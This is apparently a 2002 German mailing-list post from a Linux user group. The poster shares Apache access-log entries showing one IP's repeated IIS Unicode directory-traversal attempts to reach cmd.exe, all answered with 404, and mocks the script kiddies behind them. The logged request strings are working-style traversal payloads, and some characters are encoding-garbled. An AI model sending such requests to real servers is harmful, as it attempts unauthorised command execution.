also mein apache sieht solche dinger, und das ist nur 1% von dem was dort geht. ich w�rde gern mal wissen, welche scruptkiddy-attacke durchgehen: das gute unicode exploid: 80.8.122.183 - - [25/Nov/2002:14:14:40 +0100] "GET /scripts/..� ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 756 0 "-" "-" 80.8.122.183 - - [25/Nov/2002:14:14:44 +0100] "GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 756 0 "-" "-" 80.8.122.183 - - [25/Nov/2002:14:14:48 +0100] "GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 756 0 "-" "-" 80.8.122.183 - - [25/Nov/2002:14:14:51 +0100] "GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 756 0 "-" "-" 80.8.122.183 - - [25/Nov/2002:14:14:55 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 756 0 "-" "-" 80.8.122.183 - - [25/Nov/2002:14:14:59 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 756 0 "-" "-" 80.8.122.183 - - [25/Nov/2002:14:15:03 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 756 0 "-" "-" 80.8.122.183 - - [25/Nov/2002:14:15:07 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 756 0 "-" "-"
das ganze zieht sich schon seit langem durch unser webserver log. die vorkommnisse werden dennoch h�ufiger. d�mliches Pubing. manchmal macht es richtig spass live zuzugucken, wie einer sich einen abbricht, um auf den nicht vorhandenen IIS zu kommen. rofl. ---------------------------------------------------------------------------- PUG - Penguin User Group Wiesbaden - http://www.pug.org
